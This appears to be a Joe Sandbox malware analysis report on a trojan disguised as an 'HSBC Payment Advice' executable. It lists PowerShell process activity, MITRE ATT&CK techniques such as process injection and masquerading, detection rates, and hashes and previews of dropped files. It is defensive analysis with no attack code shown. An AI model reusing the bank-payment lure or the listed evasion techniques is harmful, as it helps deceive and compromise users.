    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exe Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F0A
    MITRE ATT&CK Matrix (figures in parentheses are the report's per-technique counts, reproduced as extracted; techniques without a figure are unmatched matrix cells):
    Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
    Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
    Execution: Windows Management Instrumentation (1), Native API (1), Shared Modules (1), PowerShell (1), Launchd
    Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
    Privilege Escalation: Process Injection (111), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script
    Defense Evasion: Masquerading (11), Process Injection (111), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1)
    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
    Discovery: Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (14), Internet Connection Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
    Collection: Archive Collected Data (1), Clipboard Data (1), Data from Network Shared Drive, Input Capture, Keylogging
    Command and Control: Encrypted Channel (1), Junk Data, Steganography, Protocol Impersonation, Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
    Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
    Source | Detection | Scanner
    HSBC Payment Advice.exe | 11% | ReversingLabs
    HSBC Payment Advice.exe | 22% | Virustotal
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner
    http://pesterbdd.com/images/Pester.png | 10% | Virustotal
    https://aka.ms/pscore6lB | 0% | Virustotal
    https://nuget.org/nuget.exe | 0% | Virustotal
    https://github.com/Pester/Pester4 | 0% | Virustotal
    http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal
    https://contoso.com/ | 0% | Virustotal
    https://contoso.com/License | 0% | Virustotal
    https://contoso.com/Icon | 0% | Virustotal
    http://nuget.org/NuGet.exe | 0% | Virustotal
    http://nsis.sf.net/NSIS_ErrorError | 0% | Virustotal
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | Virustotal
    http://pesterbdd.com/images/Pester.png4 | 10% | Virustotal
    https://github.com/Pester/Pester | 1% | Virustotal
    http://www.apache.org/licenses/LICENSE-2.0.html4 | 0% | Virustotal
    No contacted domains info
    Name | Source | Malicious | Reputation
    http://pesterbdd.com/images/Pester.png4 | powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://github.com/Pester/Pester4 | powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://contoso.com/ | powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://contoso.com/License | powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://contoso.com/Icon | powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    http://www.quovadis.bm0 | powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp | false | unknown
    http://nsis.sf.net/NSIS_ErrorError | HSBC Payment Advice.exe | false | unknown
    https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmp | false | unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html4 | powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
    https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp | false | unknown
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1533042
        Start date and time:2024-10-14 11:14:31 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 14m 5s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
        Run name:Suspected Instruction Hammering
        Number of analysed new started processes analysed:42
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:HSBC Payment Advice.exe
        Detection:MAL
        Classification:mal92.troj.evad.winEXE@4590/16@0/0
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 119
        • Number of non-executed functions: 37
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): dllhost.exe
        • Execution Graph export aborted for target powershell.exe, PID 2088 because it is empty
        • Not all processes were analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtWriteVirtualMemory calls found.
        Time | Type | Description
        05:18:16 | API Interceptor | 1545x Sleep call for process: powershell.exe modified
        No context
        No context
        No context
        No context
        No context
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:modified
        Size (bytes):14744
        Entropy (8bit):4.990428309401091
        Encrypted:false
        SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
        MD5:A3F4A4CED5E4717EA59EEDAAA642F0CF
        SHA1:EB40B4929869C8C2A8866A0F06AE166F406FE493
        SHA-256:59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
        SHA-512:804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
        Malicious:false
        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):2346484
        Entropy (8bit):2.6764557765488286
        Encrypted:false
        SSDEEP:12288:3FaexgeSmAmf3jdR+2MmZOUnKHVw3h7UKfoum:V3HvjJMm1K1yh7UKwum
        MD5:01A87B57636D19615826E1CD27E75605
        SHA1:A15238BA9679A31B05144C293DFE18C55EC7C7AB
        SHA-256:C978FB1F2F3F24E29E81D035CF26CEC5824262F073FD1529509593D443E2CB4E
        SHA-512:57AB6B72768F3410DAC0E1B9844CF4C4F5F51EBB5CC3EA57A51B1435BC2F39DAAB692445C6E476237BF9D373E7C5C034B75FC69004A90DB9039441EB231159CF
        Malicious:false
        Preview:.$......,...................>...........P#.......$..........................................................Q?k.............................................................................................................................................................................G...f...........S...j...............................................................................................................................................'.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
        Category:dropped
        Size (bytes):898
        Entropy (8bit):3.2766262321715875
        Encrypted:false
        SSDEEP:12:8wl09sXUCr/ptYKp8WMhq6DrbMJKcsJL4/rNJkKAh4t2YCBTo8:8upp1haqsUgcB5HALJT
        MD5:87C111CAA4B128D591838A0A9BFC2427
        SHA1:A06D680CDFD30E1FFF94D6852F79FBD35355302B
        SHA-256:A42A874DCC24667D28C48CE4E400C45DFE81C5C5FB83103571BE8A989133639D
        SHA-512:2D5510FA697D3B7EBCD75AF39BCA568A8F82AFB9BEA40FE573CDC87AB00DCFFABF0423EF6F28ED34AAF4815252D688BB16A0913B991058BD9A6AE3B504BF8E2A
        Malicious:false
        Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....`.1...........seralbumen..F............................................s.e.r.a.l.b.u.m.e.n.....t.2...........Retslgeraad.Gun38.T............................................R.e.t.s.l.g.e.r.a.a.d...G.u.n.3.8... ...%.....\.....\.....\.s.e.r.a.l.b.u.m.e.n.\.R.e.t.s.l.g.e.r.a.a.d...G.u.n.3.8.;.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.a.a.s.e.l.a.t.t.e.r.e.n.\.V.r.d.i.r.e.d.u.k.t.i.o.n.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):184027
        Entropy (8bit):1.248418828542474
        Encrypted:false
        SSDEEP:768:pgAYiP+iKchwZNz9UiS03gnRU8cD1OJU26mly/WqcdX7rTZRgkuKL1Y2afh3ntqa:xMch0aUWkErXc928XJ3qRo
        MD5:0E5CFF01F43D9999324B60E3B3294CDD
        SHA1:69296289CAAD7B7F5C878BBA057108425B83276F
        SHA-256:BFCB9F5C3E66F7C32F7572679D9E59E3E300B5407D6B44D2B2EB3179283C8122
        SHA-512:7E302AEEEA08ABCBF565A804A3353AC173D2BA2F63CE805E2265EF97CBB789B78F8F723B442A9B54116966793E460B53C904396A13D9A3FF9876CB43A2235FB3
        Malicious:false
        Preview:....2...K...............C...............................................J.........D........W+...\........B............u......................................$.........................+...................r.......................*......................................................................?..........................................................h. B................................................................................]......................=...................................................................z..$......................*.......................................................................`..........t...........................u..6.....................~.......................o........|...........X.............................................................................................................U..............]................................3..................Q................................................A..................g...............
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):427169
        Entropy (8bit):1.2548989085548696
        Encrypted:false
        SSDEEP:1536:qk1x2Ro2V5D13zTZVhAk76+9/xT9sqt0W:J1xAoAr3xA1Sx9P
        MD5:E5089EDB79BFDF4A2B7A8891D24D00F0
        SHA1:6C4E7B6289161485A1DFBE5CEEA8771A3F8D94D3
        SHA-256:97111D973C70C28EFB47FC311968205CB23CDDC8F21491003FD7544778B7340D
        SHA-512:F38B9951B5368C5CA31F7D709006A44E94B5CE0C917249E98F1BC8982263DA552961CA6EBF8DC549D3C5216A886056AA301B5BDE011E5DB14D9513F5BAA6444A
        Malicious:false
        Preview:................&......(.........N..............."..|...............................J............................G............................#.................................H.....................K..............................................................-..............................I.........................`...........................................}.......................................2..........................................d...........................................................................................................f...............0u....................h.........9....................................."..............................................B..............................................7................................u.......$.........................................................\...........s...................t.............?.-....................................... ..............................................?........a..................."...
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):453470
        Entropy (8bit):1.2466668359396458
        Encrypted:false
        SSDEEP:1536:MKU4IGmVSWVDvmX9vPFBNYmRFd4XH7yW8/I4Ui4q+:I4l0vChPbPFd4ry7Wfq+
        MD5:B3949E0BC3C83D6E90EB1CCC7726740B
        SHA1:7A6F4C2F2C640BF8216E596AC80E0790D944476E
        SHA-256:484411D10FCDB12732B731B31D1D50FFE081066A98C2413F4AC984E4B7E57283
        SHA-512:03CD02BAC4908209C79E9E71F6F8931A56AF9AC55DA7503BD2E03EFCB024B88E011692A42B16B0F5B2C5EBD7A74385D084F8C4E5940D048D58E933D7400A41DB
        Malicious:false
        Preview:.T...................=....,.............-........................................s...................,.v.............F...............................................d.......................................................Z.....D........'......................Z...................................~....................................................E..................f.....................................................................{...................1.......~..................................................I..............................BZ..&................................>...............................t.......................................................................................................................................l...................................\....................W...................................K............................................Q.............................................................................................................
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):312946
        Entropy (8bit):7.653634416909151
        Encrypted:false
        SSDEEP:6144:jrfObe+OMwoN4UsGC7gef6mBqmbm43lbH6UPjddH+2VrO6xvT:vFaexgeSmAmf3jdR+2Mm
        MD5:ED7B948861B8940807B3BC3DBE9FFEE3
        SHA1:A6EFE544D34A5EF4957FF441CE6F3F96AEC74614
        SHA-256:36D1FF1E3DDD5A503B213409932705ECB9BFA47C1CFB956FAD52E54CAA0EB19C
        SHA-512:C8FAB8B14D6C6978ADB222DD879F8E9EA533EDE1EA7A2A52A1AF05DCAE9C58A39BA378DB380A56DA7588DEC48108FABF4C7BB924DA285B0FF1C6DDC28A23045A
        Malicious:false
        Preview:........n......................555......v...............................###...--.........KK..y..............................U...................[[[.WWW.........H.$$....................MM....................................s..bbb..................pppp.....................................vvv......E......vvv.........,,..W...............88.........;;...........N........................................$$.............................z......r....%..........kkkk.........................................}.........HHH.55...n.m...B.....+..............lll..........................bb...w.C....y.....5...~..........o..WW.............v.......................;;;;.<.....MMMMMMM.............rrr...ii.......%%.......cc....i........1...e......K................................[[....P............??????............9....h....6..u............>>>>....hhhhh.............BBBB.....AA.............d............'....]............`................''...............................................@@.hh............N.......=.
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:X11 SNF font data, MSB first
        Category:dropped
        Size (bytes):369472
        Entropy (8bit):1.253460385105366
        Encrypted:false
        SSDEEP:768:Vn/F3NyAuHt45PnXEjFaWZ1fIooQPU/37MlXVB+sjyPC7lU8+Esh1moJDleOh60j:VP9XyNc4t+T3ZBYiLyZ4RWwjBww
        MD5:23A9A227F832951F0D48E99468C2AB1D
        SHA1:152D6A33ED73D974A82F16494C19CEB994FEB2C7
        SHA-256:82F2D51505FF65C66402E44C5E477BBB0F1BACC5FE108CD544051AF2B85901B8
        SHA-512:37F7E92AF04D2F3769FE60995C7B7CA2F7B3E87F04BAAD48364D92B1D75E92FA50C929EA100FD82638DE8CFF19DBEA46199C341625ADD7F9FDD1814723313960
        Malicious:false
        Preview:..........................................................................X................$.L...................................................i.....................8......................................................................................L........................................|..................o...............o....L......................g........................................u......c.........2.......X........................c1.........................4.'..........&.l..................................a......................v........................N.........C................................................j...........................x...............................................p..........e........u...............H.....].................................................R......................k..........h.............................u..g.............................................................................................:.....................................
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):538
        Entropy (8bit):4.238112058475284
        Encrypted:false
        SSDEEP:12:DwPAxW2qvFFJEEPZtOeImJK/g3757qa2ZMy3lqVI9V:DwPAQ2qv9ELzcKgoa2p1ga
        MD5:64C65B2685E171DD30270CEA73C90633
        SHA1:B1ECAE8EF2A1657F10EC62038AB02A0B1BF019CA
        SHA-256:6235C32E9A34F177C9E09B269FDB716C68F34FAD237ECA41B9720B44EF2B8FA1
        SHA-512:9461759D4830975EBB11C81513AB3C9C7D1E85A04D8C204B9CBE9FBD0D6BCE4DBFEFA6C59605C6F6E308326BDB7C492CE5D37596B899AE56989728AD0C3ABDFE
        Malicious:false
        Preview:gingili brailing regningsenheden rosin functionalises hestepensionerne zonesystems..centrumsdemokraternes pronationalist genbilledet idiologism.bulnet parastas fjeldrred fnblge videokassettens exordize resignment zinkkografierne disannex reordained onstand..arabise skrofuloses konvoluteredes advowsance cirkusteltes exfoliated prekantian..brugerantals secrets afsoegning metalraffinaderierne underskirt uvrgeligt humification palle uegennyttigere superabundance temporalt..fjendskab flyttedes deliriske tykmlet udstillingscentrene debut.
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):97718
        Entropy (8bit):1.2593766358472382
        Encrypted:false
        SSDEEP:768:hsqVrxXVypAWHKXZ2QTVmL5ls0kIYN/71ef+DGMl+:TrxAEj1efX
        MD5:2ACE5A50C1A1FAD5477C1A3A24DB47A4
        SHA1:4D830326E0FA772213DD803705A97051246F4837
        SHA-256:7FE6E8ECBBAA0A72AD4E4D2CA706B440DC5AE0EA216F4067B8544FEF84EC75CE
        SHA-512:DCFB8103FB1A13E1BD1D1E6FAF0DFC8263362EC90E103B522BF7AA23B218DF96BE54A032A21DD4A708212FEEE1207C52273C6EB2C81287811FF0EB1C836FE71E
        Malicious:false
        Preview:........................................-....................8.................n.....6............................................`...............................................................W.....................U.......G...............................................Y.....H..e.............O.........}.........................p.........&.......P.....................................................................................GG..........................~............................d.................................................... ...S....................................................E...............|.......................................................2..............................R...5.....................................I............................................._............ ......`.......................0.............................................................z....................................8......../..............................................U......s
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:data
        Category:dropped
        Size (bytes):417254
        Entropy (8bit):1.2476145097876685
        Encrypted:false
        SSDEEP:1536:Wy0BNg/4UOfWwWNPwJAXJAA6u9ztfGShS:m8hOfWwW67u9zRS
        MD5:84F50E358CBC32D337514A9E53E83A26
        SHA1:0BD7514A20FE2B2B606442E7698A15F43BF164F5
        SHA-256:01634F194FDF6055C9E00F62E869A1AF6E619E0BB566733258A1B7EA03A8F012
        SHA-512:8F81558697FAA4981C700A39C6762F60619FF373612775CBAA23E34F2125AADF939EACD7A57BD84E59429487F16E039547A98F99B03CB7C94411FEB1B8065B2E
        Malicious:false
        Preview:............h.................................y.....5...........................................................F.....................................*...........................................................q.................D...................................................................7.........................w............^.........................S.............................................................W..........N................C..............L......................*...................D...............E...b.....W...................Q.....................................?.......................0.........................................{.................m.............................^......................}.........................v.............................................^..................0..............................*......................................................................................j...................._.......................................
        Process:C:\Users\user\Desktop\HSBC Payment Advice.exe
        File Type:ASCII text, with very long lines (4295), with CRLF, LF line terminators
        Category:dropped
        Size (bytes):74612
        Entropy (8bit):5.143193997878062
        Encrypted:false
        SSDEEP:1536:LjahcOrkEWFO5OntZ2zDE5r2QL0IA7BEyWNSEhz2CeAR72UX16Cu17Bv8:fahcOrgnKE5YV7VwqvmX072
